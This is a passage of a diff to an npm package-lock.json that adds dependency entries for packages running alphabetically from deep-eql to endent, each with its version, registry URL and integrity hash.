"https://registry.npmjs.org/deep-eql/-/deep-eql-3.0.1.tgz", + "integrity": "sha512-+QeIQyN5ZuO+3Uk5DYh6/1eKO0m0YmJFGNmFHGACpf1ClL1nmlV/p4gNgbl2pJGxgXb4faqo6UE+M5ACEMyVcw==", + "dev": true, + "dependencies": { + "type-detect": "^4.0.0" + }, + "engines": { + "node": ">=0.12" + } + }, + "node_modules/deep-equal": { + "version": "2.2.1", + "resolved": "https://registry.npmjs.org/deep-equal/-/deep-equal-2.2.1.tgz", + "integrity": "sha512-lKdkdV6EOGoVn65XaOsPdH4rMxTZOnmFyuIkMjM1i5HHCbfjC97dawgTAy0deYNfuqUqW+Q5VrVaQYtUpSd6yQ==", + "dev": true, + "dependencies": { + "array-buffer-byte-length": "^1.0.0", + "call-bind": "^1.0.2", + "es-get-iterator": "^1.1.3", + "get-intrinsic": "^1.2.0", + "is-arguments": "^1.1.1", + "is-array-buffer": "^3.0.2", + "is-date-object": "^1.0.5", + "is-regex": "^1.1.4", + "is-shared-array-buffer": "^1.0.2", + "isarray": "^2.0.5", + "object-is": "^1.1.5", + "object-keys": "^1.1.1", + "object.assign": "^4.1.4", + "regexp.prototype.flags": "^1.5.0", + "side-channel": "^1.0.4", + "which-boxed-primitive": "^1.0.2", + "which-collection": "^1.0.1", + "which-typed-array": "^1.1.9" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/deep-extend": { + "version": "0.6.0", + "resolved": "https://registry.npmjs.org/deep-extend/-/deep-extend-0.6.0.tgz", + "integrity": "sha512-LOHxIOaPYdHlJRtCQfDIVZtfw/ufM8+rVj649RIHzcm/vGwQRXFt6OPqIFWsm2XEMrNIEtWR64sY1LEKD2vAOA==", + "engines": { + "node": ">=4.0.0" + } + }, + "node_modules/deep-freeze": { + "version": "0.0.1", + "resolved": "https://registry.npmjs.org/deep-freeze/-/deep-freeze-0.0.1.tgz", + "integrity": "sha512-Z+z8HiAvsGwmjqlphnHW5oz6yWlOwu6EQfFTjmeTWlDeda3FS2yv3jhq35TX/ewmsnqB+RX2IdsIOyjJCQN5tg==" + }, + "node_modules/deep-is": { + "version": "0.1.4", + "resolved": "https://registry.npmjs.org/deep-is/-/deep-is-0.1.4.tgz", + "integrity": "sha512-oIPzksmTg4/MriiaYGO+okXDT7ztn/w3Eptv/+gSIdMdKsJo0u4CfYNFJPy+4SKMuCqGw2wxnA+URMg3t8a/bQ==" + }, + "node_modules/deepmerge": { + "version": "4.2.2", + "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-4.2.2.tgz", + "integrity": "sha512-FJ3UgI4gIl+PHZm53knsuSFpE+nESMr7M4v9QcgB7S63Kj/6WqMiFQJpBBYz1Pt+66bZpP3Q7Lye0Oo9MPKEdg==", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/default-browser": { + "version": "5.2.1", + "resolved": "https://registry.npmjs.org/default-browser/-/default-browser-5.2.1.tgz", + "integrity": "sha512-WY/3TUME0x3KPYdRRxEJJvXRHV4PyPoUsxtZa78lwItwRQRHhd2U9xOscaT/YTf8uCXIAjeJOFBVEh/7FtD8Xg==", + "dev": true, + "license": "MIT", + "dependencies": { + "bundle-name": "^4.1.0", + "default-browser-id": "^5.0.0" + }, + "engines": { + "node": ">=18" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/default-browser-id": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/default-browser-id/-/default-browser-id-5.0.0.tgz", + "integrity": "sha512-A6p/pu/6fyBcA1TRz/GqWYPViplrftcW2gZC9q79ngNCKAeR/X3gcEdXQHl4KNXV+3wgIJ1CPkJQ3IHM6lcsyA==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=18" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/defaults": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/defaults/-/defaults-1.0.4.tgz", + "integrity": "sha512-eFuaLoy/Rxalv2kr+lqMlUnrDWV+3j4pljOIJgLIhI058IQfWJ7vXhyEIHu+HtC738klGALYxOKDO0bQP3tg8A==", + "dependencies": { + "clone": "^1.0.2" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/defaults/node_modules/clone": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/clone/-/clone-1.0.4.tgz", + "integrity": "sha512-JQHZ2QMW6l3aH/j6xCqQThY/9OH4D/9ls34cgkUBiEeocRTU04tHfKPBsUK1PqZCUQM7GiA0IIXJSuXHI64Kbg==", + "engines": { + "node": ">=0.8" + } + }, + "node_modules/define-data-property": { + "version": "1.1.4", + "resolved": "https://registry.npmjs.org/define-data-property/-/define-data-property-1.1.4.tgz", + "integrity": "sha512-rBMvIzlpA8v6E+SJZoo++HAYqsLrkg7MSfIinMPFhmkorw7X+dOXVJQs+QT69zGkzMyfDnIMN2Wid1+NbL3T+A==", + "dependencies": { + "es-define-property": "^1.0.0", + "es-errors": "^1.3.0", + "gopd": "^1.0.1" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/define-lazy-prop": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/define-lazy-prop/-/define-lazy-prop-2.0.0.tgz", + "integrity": "sha512-Ds09qNh8yw3khSjiJjiUInaGX9xlqZDY7JVryGxdxV7NPeuqQfplOpQ66yJFZut3jLa5zOwkXw1g9EI2uKh4Og==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=8" + } + }, + "node_modules/define-properties": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/define-properties/-/define-properties-1.2.1.tgz", + "integrity": "sha512-8QmQKqEASLd5nx0U1B1okLElbUuuttJ/AnYmRXbbbGDWh6uS208EjD4Xqq/I9wK7u0v6O08XhTWnt5XtEbR6Dg==", + "license": "MIT", + "dependencies": { + "define-data-property": "^1.0.1", + "has-property-descriptors": "^1.0.0", + "object-keys": "^1.1.1" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/define-property": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/define-property/-/define-property-2.0.2.tgz", + "integrity": "sha512-jwK2UV4cnPpbcG7+VRARKTZPUWowwXA8bzH5NP6ud0oeAxyYPuGZUAC7hMugpCdz4BeSZl2Dl9k66CHJ/46ZYQ==", + "dev": true, + "dependencies": { + "is-descriptor": "^1.0.2", + "isobject": "^3.0.1" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/defu": { + "version": "6.1.4", + "resolved": "https://registry.npmjs.org/defu/-/defu-6.1.4.tgz", + "integrity": "sha512-mEQCMmwJu317oSz8CwdIOdwf3xMif1ttiM8LTufzc3g6kR+9Pe236twL8j3IYT1F7GfRgGcW6MWxzZjLIkuHIg==", + "dev": true, + "license": "MIT" + }, + "node_modules/delay": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/delay/-/delay-5.0.0.tgz", + "integrity": "sha512-ReEBKkIfe4ya47wlPYf/gu5ib6yUG0/Aez0JQZQz94kiWtRQvZIQbTiehsnwHvLSWJnQdhVeqYue7Id1dKr0qw==", + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/delayed-stream": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", + "integrity": "sha1-3zrhmayt+31ECqrgsp4icrJOxhk=", + "engines": { + "node": ">=0.4.0" + } + }, + "node_modules/delegates": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/delegates/-/delegates-1.0.0.tgz", + "integrity": "sha1-hMbhWbgZBP3KWaDvRM2HDTElD5o=" + }, + "node_modules/denque": { + "version": "1.5.1", + "resolved": "https://registry.npmjs.org/denque/-/denque-1.5.1.tgz", + "integrity": "sha512-XwE+iZ4D6ZUB7mfYRMb5wByE8L74HCn30FBN7sWnXksWc1LO1bPDl67pBR9o/kC4z/xSNAwkMYcGgqDV3BE3Hw==", + "engines": { + "node": ">=0.10" + } + }, + "node_modules/depd": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/depd/-/depd-1.1.2.tgz", + "integrity": "sha1-m81S4UwJd2PnSbJ0xDRu0uVgtak=", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/dequal": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/dequal/-/dequal-2.0.3.tgz", + "integrity": "sha512-0je+qPKHEMohvfRTCEo3CrPG6cAzAYgmzKyxRiYSSDkS6eGJdyVJm7WaYA5ECaAD9wLB2T4EEeymA5aFVcYXCA==", + "dev": true, + "engines": { + "node": ">=6" + } + }, + "node_modules/destroy": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/destroy/-/destroy-1.2.0.tgz", + "integrity": "sha512-2sJGJTaXIIaR1w4iJSNoN0hnMY7Gpc/n8D4qSCJw8QqFWXf7cuAgnEHxBpweaVcPevC2l3KpjYCx3NypQQgaJg==", + "engines": { + "node": ">= 0.8", + "npm": "1.2.8000 || >= 1.4.16" + } + }, + "node_modules/detect-libc": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/detect-libc/-/detect-libc-1.0.3.tgz", + "integrity": "sha1-+hN8S9aY7fVc1c0CrFWfkaTEups=", + "bin": { + "detect-libc": "bin/detect-libc.js" + }, + "engines": { + "node": ">=0.10" + } + }, + "node_modules/detect-node": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/detect-node/-/detect-node-2.1.0.tgz", + "integrity": "sha512-T0NIuQpnTvFDATNuHN5roPwSBG83rFsuO+MXXH9/3N1eFbn4wcPjttvjMLEPWJ0RGUYgQE7cGgS3tNxbqCGM7g==", + "dev": true, + "license": "MIT" + }, + "node_modules/devlop": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/devlop/-/devlop-1.1.0.tgz", + "integrity": "sha512-RWmIqhcFf1lRYBvNmr7qTNuyCt/7/ns2jbpp1+PalgE/rDQcBT0fioSMUpJ93irlUhC5hrg4cYqe6U+0ImW0rA==", + "dev": true, + "dependencies": { + "dequal": "^2.0.0" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/wooorm" + } + }, + "node_modules/dezalgo": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/dezalgo/-/dezalgo-1.0.4.tgz", + "integrity": "sha512-rXSP0bf+5n0Qonsb+SVVfNfIsimO4HEtmnIpPHY8Q1UCzKlQrDMfdobr8nJOOsRgWCyMRqeSBQzmWUMq7zvVig==", + "dev": true, + "dependencies": { + "asap": "^2.0.0", + "wrappy": "1" + } + }, + "node_modules/diff": { + "version": "5.2.0", + "resolved": "https://registry.npmjs.org/diff/-/diff-5.2.0.tgz", + "integrity": "sha512-uIFDxqpRZGZ6ThOk84hEfqWoHx2devRFvpTZcTHur85vImfaxUbTW9Ryh4CpCuDnToOP1CEtXKIgytHBPVff5A==", + "dev": true, + "license": "BSD-3-Clause", + "engines": { + "node": ">=0.3.1" + } + }, + "node_modules/diff-match-patch": { + "version": "1.0.5", + "resolved": "git+ssh://git@github.com/overleaf/diff-match-patch.git#89805f9c671a77a263fc53461acd62aa7498f688", + "integrity": "sha512-UfwfKGxT/Wm2KaxFSZsp7/+YOnAgIzxQXs86zu1IFMLU/+3ouxnEvXqPDn3yxSxlsO4r1B+I2GGQHsIthp6/7Q==", + "license": "Apache-2.0" + }, + "node_modules/diff3": { + "version": "0.0.3", + "resolved": "https://registry.npmjs.org/diff3/-/diff3-0.0.3.tgz", + "integrity": "sha512-iSq8ngPOt0K53A6eVr4d5Kn6GNrM2nQZtC740pzIriHtn4pOQ2lyzEXQMBeVcWERN0ye7fhBsk9PbLLQOnUx/g==", + "dev": true, + "license": "MIT" + }, + "node_modules/dijkstrajs": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/dijkstrajs/-/dijkstrajs-1.0.2.tgz", + "integrity": "sha512-QV6PMaHTCNmKSeP6QoXhVTw9snc9VD8MulTT0Bd99Pacp4SS1cjcrYPgBPmibqKVtMJJfqC6XvOXgPMEEPH/fg==", + "dev": true + }, + "node_modules/dir-glob": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/dir-glob/-/dir-glob-3.0.1.tgz", + "integrity": "sha512-WkrWp9GR4KXfKGYzOLmTuGVi1UWFfws377n9cc55/tb6DuqyF6pcQ5AbiHEshaDpY9v6oaSr2XCDidGmMwdzIA==", + "dev": true, + "dependencies": { + "path-type": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/dnd-core": { + "version": "16.0.1", + "resolved": "https://registry.npmjs.org/dnd-core/-/dnd-core-16.0.1.tgz", + "integrity": "sha512-HK294sl7tbw6F6IeuK16YSBUoorvHpY8RHO+9yFfaJyCDVb6n7PRcezrOEOa2SBCqiYpemh5Jx20ZcjKdFAVng==", + "dev": true, + "dependencies": { + "@react-dnd/asap": "^5.0.1", + "@react-dnd/invariant": "^4.0.1", + "redux": "^4.2.0" + } + }, + "node_modules/dns-packet": { + "version": "5.6.1", + "resolved": "https://registry.npmjs.org/dns-packet/-/dns-packet-5.6.1.tgz", + "integrity": "sha512-l4gcSouhcgIKRvyy99RNVOgxXiicE+2jZoNmaNmZ6JXiGajBOJAesk1OBlJuM5k2c+eudGdLxDqXuPCKIj6kpw==", + "dev": true, + "license": "MIT", + "dependencies": { + "@leichtgewicht/ip-codec": "^2.0.1" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/doctrine": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/doctrine/-/doctrine-3.0.0.tgz", + "integrity": "sha512-yS+Q5i3hBf7GBkd4KG8a7eBNNWNGLTaEwwYWUijIYM7zrlYDM0BFXHjjPWlWZ1Rg7UaddZeIDmi9jF3HmqiQ2w==", + "dependencies": { + "esutils": "^2.0.2" + }, + "engines": { + "node": ">=6.0.0" + } + }, + "node_modules/doctypes": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/doctypes/-/doctypes-1.1.0.tgz", + "integrity": "sha512-LLBi6pEqS6Do3EKQ3J0NqHWV5hhb78Pi8vvESYwyOy2c31ZEZVdtitdzsQsKb7878PEERhzUk0ftqGhG6Mz+pQ==" + }, + "node_modules/dom-accessibility-api": { + "version": "0.5.11", + "resolved": "https://registry.npmjs.org/dom-accessibility-api/-/dom-accessibility-api-0.5.11.tgz", + "integrity": "sha512-7X6GvzjYf4yTdRKuCVScV+aA9Fvh5r8WzWrXBH9w82ZWB/eYDMGCnazoC/YAqAzUJWHzLOnZqr46K3iEyUhUvw==", + "dev": true + }, + "node_modules/dom-converter": { + "version": "0.2.0", + "resolved": "https://registry.npmjs.org/dom-converter/-/dom-converter-0.2.0.tgz", + "integrity": "sha512-gd3ypIPfOMr9h5jIKq8E3sHOTCjeirnl0WK5ZdS1AW0Odt0b1PaWaHdJ4Qk4klv+YB9aJBS7mESXjFoDQPu6DA==", + "dev": true, + "dependencies": { + "utila": "~0.4" + } + }, + "node_modules/dom-serializer": { + "version": "1.3.2", + "resolved": "https://registry.npmjs.org/dom-serializer/-/dom-serializer-1.3.2.tgz", + "integrity": "sha512-5c54Bk5Dw4qAxNOI1pFEizPSjVsx5+bpJKmL2kPn8JhBUq2q09tTCa3mjijun2NfK78NMouDYNMBkOrPZiS+ig==", + "dev": true, + "dependencies": { + "domelementtype": "^2.0.1", + "domhandler": "^4.2.0", + "entities": "^2.0.0" + }, + "funding": { + "url": "https://github.com/cheeriojs/dom-serializer?sponsor=1" + } + }, + "node_modules/dom-walk": { + "version": "0.1.2", + "resolved": "https://registry.npmjs.org/dom-walk/-/dom-walk-0.1.2.tgz", + "integrity": "sha512-6QvTW9mrGeIegrFXdtQi9pk7O/nSK6lSdXW2eqUspN5LWD7UTji2Fqw5V2YLjBpHEoU9Xl/eUWNpDeZvoyOv2w==", + "dev": true + }, + "node_modules/domelementtype": { + "version": "2.3.0", + "resolved": "https://registry.npmjs.org/domelementtype/-/domelementtype-2.3.0.tgz", + "integrity": "sha512-OLETBj6w0OsagBwdXnPdN0cnMfF9opN69co+7ZrbfPGrdpPVNBUj02spi6B1N7wChLQiPn4CSH/zJvXw56gmHw==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/fb55" + } + ] + }, + "node_modules/domexception": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/domexception/-/domexception-4.0.0.tgz", + "integrity": "sha512-A2is4PLG+eeSfoTMA95/s4pvAoSo2mKtiM5jlHkAVewmiO8ISFTFKZjH7UAM1Atli/OT/7JHOrJRJiMKUZKYBw==", + "dev": true, + "dependencies": { + "webidl-conversions": "^7.0.0" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/domhandler": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/domhandler/-/domhandler-4.3.0.tgz", + "integrity": "sha512-fC0aXNQXqKSFTr2wDNZDhsEYjCiYsDWl3D01kwt25hm1YIPyDGHvvi3rw+PLqHAl/m71MaiF7d5zvBr0p5UB2g==", + "dev": true, + "dependencies": { + "domelementtype": "^2.2.0" + }, + "engines": { + "node": ">= 4" + }, + "funding": { + "url": "https://github.com/fb55/domhandler?sponsor=1" + } + }, + "node_modules/dompurify": { + "version": "3.2.4", + "resolved": "https://registry.npmjs.org/dompurify/-/dompurify-3.2.4.tgz", + "integrity": "sha512-ysFSFEDVduQpyhzAob/kkuJjf5zWkZD8/A9ywSp1byueyuCfHamrCBa14/Oc2iiB0e51B+NpxSl5gmzn+Ms/mg==", + "dev": true, + "license": "(MPL-2.0 OR Apache-2.0)", + "optionalDependencies": { + "@types/trusted-types": "^2.0.7" + } + }, + "node_modules/domutils": { + "version": "2.8.0", + "resolved": "https://registry.npmjs.org/domutils/-/domutils-2.8.0.tgz", + "integrity": "sha512-w96Cjofp72M5IIhpjgobBimYEfoPjx1Vx0BSX9P30WBdZW2WIKU0T1Bd0kz2eNZ9ikjKgHbEyKx8BB6H1L3h3A==", + "dev": true, + "dependencies": { + "dom-serializer": "^1.0.1", + "domelementtype": "^2.2.0", + "domhandler": "^4.2.0" + }, + "funding": { + "url": "https://github.com/fb55/domutils?sponsor=1" + } + }, + "node_modules/dont-sniff-mimetype": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/dont-sniff-mimetype/-/dont-sniff-mimetype-1.1.0.tgz", + "integrity": "sha512-ZjI4zqTaxveH2/tTlzS1wFp+7ncxNZaIEWYg3lzZRHkKf5zPT/MnEG6WL0BhHMJUabkh8GeU5NL5j+rEUCb7Ug==", + "engines": { + "node": ">=4.0.0" + } + }, + "node_modules/dot-case": { + "version": "3.0.4", + "resolved": "https://registry.npmjs.org/dot-case/-/dot-case-3.0.4.tgz", + "integrity": "sha512-Kv5nKlh6yRrdrGvxeJ2e5y2eRUpkUosIW4A2AS38zwSz27zu7ufDwQPi5Jhs3XAlGNetl3bmnGhQsMtkKJnj3w==", + "dev": true, + "dependencies": { + "no-case": "^3.0.4", + "tslib": "^2.0.3" + } + }, + "node_modules/dot-prop": { + "version": "6.0.1", + "resolved": "https://registry.npmjs.org/dot-prop/-/dot-prop-6.0.1.tgz", + "integrity": "sha512-tE7ztYzXHIeyvc7N+hR3oi7FIbf/NIjVP9hmAt3yMXzrQ072/fpjGLx2GxNxGxUl5V73MEqYzioOMoVhGMJ5cA==", + "dependencies": { + "is-obj": "^2.0.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/dottie": { + "version": "2.0.6", + "resolved": "https://registry.npmjs.org/dottie/-/dottie-2.0.6.tgz", + "integrity": "sha512-iGCHkfUc5kFekGiqhe8B/mdaurD+lakO9txNnTvKtA6PISrw86LgqHvRzWYPyoE2Ph5aMIrCw9/uko6XHTKCwA==" + }, + "node_modules/downshift": { + "version": "6.1.7", + "resolved": "https://registry.npmjs.org/downshift/-/downshift-6.1.7.tgz", + "integrity": "sha512-cVprZg/9Lvj/uhYRxELzlu1aezRcgPWBjTvspiGTVEU64gF5pRdSRKFVLcxqsZC637cLAGMbL40JavEfWnqgNg==", + "dev": true, + "dependencies": { + "@babel/runtime": "^7.14.8", + "compute-scroll-into-view": "^1.0.17", + "prop-types": "^15.7.2", + "react-is": "^17.0.2", + "tslib": "^2.3.0" + }, + "peerDependencies": { + "react": ">=16.12.0" + } + }, + "node_modules/dropbox": { + "version": "10.34.0", + "resolved": "https://registry.npmjs.org/dropbox/-/dropbox-10.34.0.tgz", + "integrity": "sha512-5jb5/XzU0fSnq36/hEpwT5/QIep7MgqKuxghEG44xCu7HruOAjPdOb3x0geXv5O/hd0nHpQpWO+r5MjYTpMvJg==", + "dependencies": { + "node-fetch": "^2.6.1" + }, + "engines": { + "node": ">=0.10.3" + }, + "peerDependencies": { + "@types/node-fetch": "^2.5.7" + } + }, + "node_modules/dset": { + "version": "3.1.4", + "resolved": "https://registry.npmjs.org/dset/-/dset-3.1.4.tgz", + "integrity": "sha512-2QF/g9/zTaPDc3BjNcVTGoBbXBgYfMTTceLaYcFJ/W9kggFUkhxD/hMEeuLKbugyef9SqAx8cpgwlIP/jinUTA==", + "license": "MIT", + "engines": { + "node": ">=4" + } + }, + "node_modules/dtrace-provider": { + "version": "0.8.8", + "resolved": "https://registry.npmjs.org/dtrace-provider/-/dtrace-provider-0.8.8.tgz", + "integrity": "sha512-b7Z7cNtHPhH9EJhNNbbeqTcXB8LGFFZhq1PGgEvpeHlzd36bhbdTWoE/Ba/YguqpBSlAPKnARWhVlhunCMwfxg==", + "hasInstallScript": true, + "dependencies": { + "nan": "^2.14.0" + }, + "engines": { + "node": ">=0.10" + } + }, + "node_modules/duration": { + "version": "0.2.2", + "resolved": "https://registry.npmjs.org/duration/-/duration-0.2.2.tgz", + "integrity": "sha512-06kgtea+bGreF5eKYgI/36A6pLXggY7oR4p1pq4SmdFBn1ReOL5D8RhG64VrqfTTKNucqqtBAwEj8aB88mcqrg==", + "dependencies": { + "d": "1", + "es5-ext": "~0.10.46" + } + }, + "node_modules/east": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/east/-/east-2.0.3.tgz", + "integrity": "sha512-ZY0gVpOxMPs99TXSK1v+KIzR2G4yP5Sru6XNbun2ebjZCWxcTQWnYdTlzHGMd7KDmiCOuZtbh8TvelakV3BWMw==", + "dependencies": { + "commander": "5.1.0", + "expressionify": "0.9.3", + "mhook": "1.0.1", + "p-map": "4.0.0", + "p-props": "4.0.0", + "p-timeout": "3.2.0", + "path-exists": "4.0.0", + "underscore": "1.12.1" + }, + "bin": { + "east": "bin/east.js" + }, + "engines": { + "node": ">=10.17.0" + } + }, + "node_modules/east/node_modules/commander": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/commander/-/commander-5.1.0.tgz", + "integrity": "sha512-P0CysNDQ7rtVw4QIQtm+MRxV66vKFSvlsQvGYXZWR3qFU0jlMKHZZZgw8e+8DSah4UDKMqnknRDQz+xuQXQ/Zg==", + "engines": { + "node": ">= 6" + } + }, + "node_modules/east/node_modules/underscore": { + "version": "1.12.1", + "resolved": "https://registry.npmjs.org/underscore/-/underscore-1.12.1.tgz", + "integrity": "sha512-hEQt0+ZLDVUMhebKxL4x1BTtDY7bavVofhZ9KZ4aI26X9SRaE+Y3m83XUL1UP2jn8ynjndwCCpEHdUG+9pP1Tw==" + }, + "node_modules/eastasianwidth": { + "version": "0.2.0", + "resolved": "https://registry.npmjs.org/eastasianwidth/-/eastasianwidth-0.2.0.tgz", + "integrity": "sha512-I88TYZWc9XiYHRQ4/3c5rjjfgkjhLyW2luGIheGERbNQ6OY7yTybanSpDXZa8y7VUP9YmDcYa+eyq4ca7iLqWA==", + "dev": true + }, + "node_modules/ecc-jsbn": { + "version": "0.1.2", + "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", + "integrity": "sha1-OoOpBOVDUyh4dMVkt1SThoSamMk=", + "dependencies": { + "jsbn": "~0.1.0", + "safer-buffer": "^2.1.0" + } + }, + "node_modules/ecdsa-sig-formatter": { + "version": "1.0.11", + "resolved": "https://registry.npmjs.org/ecdsa-sig-formatter/-/ecdsa-sig-formatter-1.0.11.tgz", + "integrity": "sha512-nagl3RYrbNv6kQkeJIpt6NJZy8twLB/2vtz6yN9Z4vRKHN4/QZJIEbqohALSgwKdnksuY3k5Addp5lg8sVoVcQ==", + "dependencies": { + "safe-buffer": "^5.0.1" + } + }, + "node_modules/editorconfig": { + "version": "0.15.3", + "resolved": "https://registry.npmjs.org/editorconfig/-/editorconfig-0.15.3.tgz", + "integrity": "sha512-M9wIMFx96vq0R4F+gRpY3o2exzb8hEj/n9S8unZtHSvYjibBp/iMufSzvmOcV/laG0ZtuTVGtiJggPOSW2r93g==", + "dev": true, + "dependencies": { + "commander": "^2.19.0", + "lru-cache": "^4.1.5", + "semver": "^5.6.0", + "sigmund": "^1.0.1" + }, + "bin": { + "editorconfig": "bin/editorconfig" + } + }, + "node_modules/editorconfig/node_modules/commander": { + "version": "2.20.3", + "resolved": "https://registry.npmjs.org/commander/-/commander-2.20.3.tgz", + "integrity": "sha512-GpVkmM8vF2vQUkj2LvZmD35JxeJOLCwJ9cUkugyk2nuhbv3+mJvpLYYt+0+USMxE+oj+ey/lJEnhZw75x/OMcQ==", + "dev": true + }, + "node_modules/editorconfig/node_modules/lru-cache": { + "version": "4.1.5", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-4.1.5.tgz", + "integrity": "sha512-sWZlbEP2OsHNkXrMl5GYk/jKk70MBng6UU4YI/qGDYbgf6YbP4EvmqISbXCoJiRKs+1bSpFHVgQxvJ17F2li5g==", + "dev": true, + "dependencies": { + "pseudomap": "^1.0.2", + "yallist": "^2.1.2" + } + }, + "node_modules/editorconfig/node_modules/semver": { + "version": "5.7.2", + "resolved": "https://registry.npmjs.org/semver/-/semver-5.7.2.tgz", + "integrity": "sha512-cBznnQ9KjJqU67B52RMC65CMarK2600WFnbkcaiwWq3xy/5haFJlshgnpjovMVJ+Hff49d8GEn0b87C5pDQ10g==", + "dev": true, + "bin": { + "semver": "bin/semver" + } + }, + "node_modules/editorconfig/node_modules/yallist": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-2.1.2.tgz", + "integrity": "sha512-ncTzHV7NvsQZkYe1DW7cbDLm0YpzHmZF5r/iyP3ZnQtMiJ+pjzisCiMNI+Sj+xQF5pXhSHxSB3uDbsBTzY/c2A==", + "dev": true + }, + "node_modules/ee-first": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/ee-first/-/ee-first-1.1.1.tgz", + "integrity": "sha1-WQxhFWsK4vTwJVcyoViyZrxWsh0=" + }, + "node_modules/ejs": { + "version": "3.1.10", + "resolved": "https://registry.npmjs.org/ejs/-/ejs-3.1.10.tgz", + "integrity": "sha512-UeJmFfOrAQS8OJWPZ4qtgHyWExa088/MtK5UEyoJGFH67cDEXkZSviOiKRCZ4Xij0zxI3JECgYs3oKx+AizQBA==", + "dependencies": { + "jake": "^10.8.5" + }, + "bin": { + "ejs": "bin/cli.js" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/electron-to-chromium": { + "version": "1.5.34", + "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.5.34.tgz", + "integrity": "sha512-/TZAiChbAflBNjCg+VvstbcwAtIL/VdMFO3NgRFIzBjpvPzWOTIbbO8kNb6RwU4bt9TP7K+3KqBKw/lOU+Y+GA==", + "dev": true + }, + "node_modules/email-addresses": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/email-addresses/-/email-addresses-5.0.0.tgz", + "integrity": "sha512-4OIPYlA6JXqtVn8zpHpGiI7vE6EQOAg16aGnDMIAlZVinnoZ8208tW1hAbjWydgN/4PLTT9q+O1K6AH/vALJGw==" + }, + "node_modules/emoji-regex": { + "version": "8.0.0", + "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", + "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==" + }, + "node_modules/emojis-list": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/emojis-list/-/emojis-list-3.0.0.tgz", + "integrity": "sha512-/kyM18EfinwXZbno9FyUGeFh87KC8HRQBQGildHZbEuRyWFOmv1U10o9BBp8XVZDVNNuQKyIGIu5ZYAAXJ0V2Q==", + "dev": true, + "engines": { + "node": ">= 4" + } + }, + "node_modules/encode-utf8": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/encode-utf8/-/encode-utf8-1.0.3.tgz", + "integrity": "sha512-ucAnuBEhUK4boH2HjVYG5Q2mQyPorvv0u/ocS+zhdw0S8AlHYY+GOFhP1Gio5z4icpP2ivFSvhtFjQi8+T9ppw==", + "dev": true + }, + "node_modules/encodeurl": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/encodeurl/-/encodeurl-1.0.2.tgz", + "integrity": "sha1-rT/0yG7C0CkyL1oCw6mmBslbP1k=", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/end-of-stream": { + "version": "1.4.4", + "resolved": "https://registry.npmjs.org/end-of-stream/-/end-of-stream-1.4.4.tgz", + "integrity": "sha512-+uw1inIHVPQoaVuHzRyXd21icM+cnt4CzD5rW+NC1wjOUSTOs+Te7FOv7AhN7vS9x/oIyhLP5PR1H+phQAHu5Q==", + "dependencies": { + "once": "^1.4.0" + } + }, + "node_modules/endent": { + "version": "2.1.0", + "resolved": 